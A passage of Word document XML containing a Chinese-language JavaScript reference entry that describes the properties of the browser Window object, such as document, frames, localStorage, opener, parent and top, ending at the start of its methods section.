        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在由</w:t>
      </w:r>
      <w:r>
        <w:t>showModalDialog()</w:t>
      </w:r>
      <w:r>
        <w:t>创</w:t>
      </w:r>
      <w:r>
        <w:t>建的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象中，这个属性是传入到</w:t>
      </w:r>
      <w:r>
        <w:t>showModalDialog()</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>arguments</w:t>
      </w:r>
      <w:r>
        <w:t>值。在常规</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象中不存在这个属性。更多信息可参见</w:t>
      </w:r>
      <w:r>
        <w:t>14.5</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly Document document</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述当前窗口的内容的</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象（细节参见</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly Event event[IE only]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>Internet Explorer</w:t>
      </w:r>
      <w:r>
        <w:t>中，这个属性指向描述最近的事件的</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>对象。在</w:t>
      </w:r>
      <w:r>
        <w:t>IE8</w:t>
      </w:r>
      <w:r>
        <w:t>及更早的版本中，事件对象并不总是会传入到事件处理程序中，这时只能通过</w:t>
      </w:r>
      <w:r>
        <w:t>这个属性来访问事件对象。更多细节可参见第</w:t>
      </w:r>
      <w:r>
        <w:t>17</w:t>
      </w:r>
      <w:r>
        <w:t>章。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly Element frameElement</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果当前</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>位于一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞中，这个属性将指代这个</w:t>
      </w:r>
      <w:r>
        <w:t>IFrame</w:t>
      </w:r>
      <w:r>
        <w:t>元素。对顶级窗口来说，这个属性将为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly Window frames</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>这个属性类似于</w:t>
      </w:r>
      <w:r>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>window</w:t>
      </w:r>
      <w:r>
        <w:t>属性，指代当前</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象本身。每个</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象都是由它包含的框架页面组成的类数组对象。如果要引用某个窗口</w:t>
      </w:r>
      <w:r>
        <w:t>w</w:t>
      </w:r>
      <w:r>
        <w:t>中的第一个框架页面，这个属性允许使用更清晰的写法</w:t>
      </w:r>
      <w:r>
        <w:t>w.frames[0]</w:t>
      </w:r>
      <w:r>
        <w:t>，而不是</w:t>
      </w:r>
      <w:r>
        <w:t>w</w:t>
      </w:r>
      <w:r>
        <w:t>[0]</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly History history</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前窗口的</w:t>
      </w:r>
      <w:r>
        <w:t>History</w:t>
      </w:r>
      <w:r>
        <w:t>对象。参见</w:t>
      </w:r>
      <w:r>
        <w:t>History</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly long innerHeight</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly long innerWidth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前窗口显示区域的文档的高度和宽度，单位是像素。</w:t>
      </w:r>
      <w:r>
        <w:t>IE8</w:t>
      </w:r>
      <w:r>
        <w:t>及更早的版本不支持这些属性。示例可见例</w:t>
      </w:r>
      <w:r>
        <w:t>15-9</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly unsigned long length</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前窗口包含的框架页面的数目。参见</w:t>
      </w:r>
      <w:r>
        <w:t>frames</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly Storage localStorage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性指代一个提供客户端名</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对存储的</w:t>
      </w:r>
      <w:r>
        <w:t>Storage</w:t>
      </w:r>
      <w:r>
        <w:t>对象。通过</w:t>
      </w:r>
      <w:r>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r>
        <w:t>存储的数据对任意同源的文档都可见并共享，并将</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>持续存在直到被用户或其他脚本删除。也可参见</w:t>
      </w:r>
      <w:r>
        <w:t>sessionStorage</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>20.1</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly Location location</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前窗口的</w:t>
      </w:r>
      <w:r>
        <w:t>Location</w:t>
      </w:r>
      <w:r>
        <w:t>对象。这个对象指明当前加载的文档的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>。将这个属性设置为一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>字符串将导致浏览器加载并显示那个</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的内容。参见</w:t>
      </w:r>
      <w:r>
        <w:t>Location</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前窗口的名字。</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>属性是可选的，可以在使用</w:t>
      </w:r>
      <w:r>
        <w:t>open()</w:t>
      </w:r>
      <w:r>
        <w:t>方法创建窗口时指定或者通过＜</w:t>
      </w:r>
      <w:r>
        <w:t>frame</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签的</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定。窗口的</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>可用做＜</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>＞或＜</w:t>
      </w:r>
      <w:r>
        <w:t>form</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签的</w:t>
      </w:r>
      <w:r>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值。以这种方式使用</w:t>
      </w:r>
      <w:r>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:t>属性，表示超链接连接的文档或者表单提交的结果应该在指定名字的窗口或框架页面中显示。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly Navigator navigator</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>指代</w:t>
      </w:r>
      <w:r>
        <w:t>Navigator</w:t>
      </w:r>
      <w:r>
        <w:t>对象，该对象提供当前</w:t>
      </w:r>
      <w:r>
        <w:t>We b</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器的版本及配置信息。参见</w:t>
      </w:r>
      <w:r>
        <w:t>Navigator</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly Window opener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>一个可读写的引用，指代包含调用</w:t>
      </w:r>
      <w:r>
        <w:t>open()</w:t>
      </w:r>
      <w:r>
        <w:t>方法打开当前浏览器窗口的脚本的那个</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象，对不是以这种方式创建的窗口来说这个属性为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。这个属性只对顶级窗口对应的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象有效，对框架页面无效。</w:t>
      </w:r>
      <w:r>
        <w:t>opener</w:t>
      </w:r>
      <w:r>
        <w:t>属性很有用，通过这个属性，新创建的窗口可以引用在创建它的窗口中定义的属性和函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly long outerHeight</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly long outerWidth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这两个属性指明当前浏览器窗口的总高度和宽度，单位为像素，包括工具栏、滚动条、窗口边框等。</w:t>
      </w:r>
      <w:r>
        <w:t>IE8</w:t>
      </w:r>
      <w:r>
        <w:t>及更早的版本不</w:t>
      </w:r>
      <w:r>
        <w:t>支持这两个属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly long pageXOffset</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly long pageYOffset</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前文档滚过的右边（</w:t>
      </w:r>
      <w:r>
        <w:t>pageXOffset</w:t>
      </w:r>
      <w:r>
        <w:t>）及下边（</w:t>
      </w:r>
      <w:r>
        <w:t>pageYOffset</w:t>
      </w:r>
      <w:r>
        <w:t>）的像素值。</w:t>
      </w:r>
      <w:r>
        <w:t>IE8</w:t>
      </w:r>
      <w:r>
        <w:t>及更早的版本不支持这两个值。示例及兼容</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>的代码见例</w:t>
      </w:r>
      <w:r>
        <w:t>15-8</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly Window parent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>包含当前窗口的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象。如果当前窗口是一个顶级窗口，则</w:t>
      </w:r>
      <w:r>
        <w:t>parent</w:t>
      </w:r>
      <w:r>
        <w:t>属性将指代当前窗口本身。如果当前窗口是一个框架页面，则</w:t>
      </w:r>
      <w:r>
        <w:t>parent</w:t>
      </w:r>
      <w:r>
        <w:t>属性将指向包含它的窗口或框架页面。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> returnValue</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>普通窗口没有这个属性，它适用于由</w:t>
      </w:r>
      <w:r>
        <w:t>showModalDialog()</w:t>
      </w:r>
      <w:r>
        <w:t>创建的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>，默认值为空字符串。一个对话框窗口关闭时（参见</w:t>
      </w:r>
      <w:r>
        <w:t>close()</w:t>
      </w:r>
      <w:r>
        <w:t>方法），这个属性的值将成为</w:t>
      </w:r>
      <w:r>
        <w:t>showModalDialog()</w:t>
      </w:r>
      <w:r>
        <w:t>的返回值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly Screen screen</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Screen</w:t>
      </w:r>
      <w:r>
        <w:t>对象指定关于当前屏幕的信息：有效的像素数和色彩数。细节可参见</w:t>
      </w:r>
      <w:r>
        <w:t>Screen</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly long screenX</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly long screenY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前窗口的左上角在屏幕中的坐标。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonl</w:t>
      </w:r>
      <w:r>
        <w:t>y Window self</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对当前窗口自身的一个引用。它是</w:t>
      </w:r>
      <w:r>
        <w:t>window</w:t>
      </w:r>
      <w:r>
        <w:t>属性的一个同义词。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly Storage sessionStorage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>这个属性指代一个提供客户端名</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对存储的</w:t>
      </w:r>
      <w:r>
        <w:t>Storage</w:t>
      </w:r>
      <w:r>
        <w:t>对象。通过</w:t>
      </w:r>
      <w:r>
        <w:t>sessionStorage</w:t>
      </w:r>
      <w:r>
        <w:t>存储的数据只对在同样的顶级窗口或标签中的同源文档可见，并只持续到当前浏览会话结束。也可参见</w:t>
      </w:r>
      <w:r>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>20.1</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly Window top</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>包含当前窗口的顶级窗口。如果当前窗口本身已经是顶级窗口了，则这个</w:t>
      </w:r>
      <w:r>
        <w:t>top</w:t>
      </w:r>
      <w:r>
        <w:t>属性将只是简单地指代当前窗</w:t>
      </w:r>
      <w:r>
        <w:t>口本身。如果当前窗口是一个框架页面，则</w:t>
      </w:r>
      <w:r>
        <w:t>top</w:t>
      </w:r>
      <w:r>
        <w:t>属性将指代包含当前框架页面的顶级窗口。注意它与</w:t>
      </w:r>
      <w:r>
        <w:t>parent</w:t>
      </w:r>
      <w:r>
        <w:t>属性的不同。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly object URL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在写作本书的时候，这个属性还只是简单地引用一个占位对象，这个对象定义的函数的文档见</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>部分。将来，这个属性可能会变成一个</w:t>
      </w:r>
      <w:r>
        <w:t>URL()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数并定义用于解析</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>和它们的查询字符串的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly Window window</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>window</w:t>
      </w:r>
      <w:r>
        <w:t>属性和</w:t>
      </w:r>
      <w:r>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:t>属性完全一样，它包含对当前窗口的一个引用。由于</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象是客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的全</w:t>
      </w:r>
      <w:r>
        <w:t>局对象，因此这个属性允许写</w:t>
      </w:r>
      <w:r>
        <w:t>window</w:t>
      </w:r>
      <w:r>
        <w:t>来引用这个全局对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>构造函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>作为客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的全局对象，</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象必须定义用于客户端环境的所有全局构造函数。虽然在这儿没有列出，不过这个部分中的所有全局构造函数都是</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的属性。例如，客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>定义了</w:t>
      </w:r>
      <w:r>
        <w:t>Image()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数的事实表示，每一个</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象都有名为</w:t>
      </w:r>
      <w:r>
        <w:t>Image</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>的属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
